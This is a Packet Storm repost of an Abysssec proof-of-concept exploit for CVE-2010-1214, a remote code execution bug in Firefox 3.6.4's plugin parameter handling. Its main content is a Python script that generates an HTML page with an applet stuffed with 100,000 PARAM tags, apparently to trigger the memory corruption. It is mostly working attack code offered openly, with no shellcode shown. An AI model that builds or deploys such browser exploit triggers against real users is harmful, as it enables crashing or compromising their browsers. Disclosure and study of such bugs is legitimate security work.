Month Of Abysssec Undisclosed Bugs - The Parameter plugin in Firefox 3.6.4 suffers from a remote code execution vulnerability.
59044f65786070ffa2cc012fdbc684d9a6add3b705bb14b9d14f2f1ccaa453a6'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
http://www.exploit-db.com/sploits/moaub-17-exploit.zip
'''
'''
Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
Version : Firefox 3.6.4
Analysis : http://www.abysssec.com
Vendor : http://www.mozilla.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1214
'''
import sys;
myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />
</head>
<body id='msg'>
<applet code = 'appletComponentArch.DynamicTreeApplet' archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >
"""
i=0
while(i<100000):
myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
i=i+1
myStyle = myStyle + """
</applet>
</body>
</html>
"""
cssFile = open("Abysssec.html","w")
cssFile.write(myStyle)
cssFile.close()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed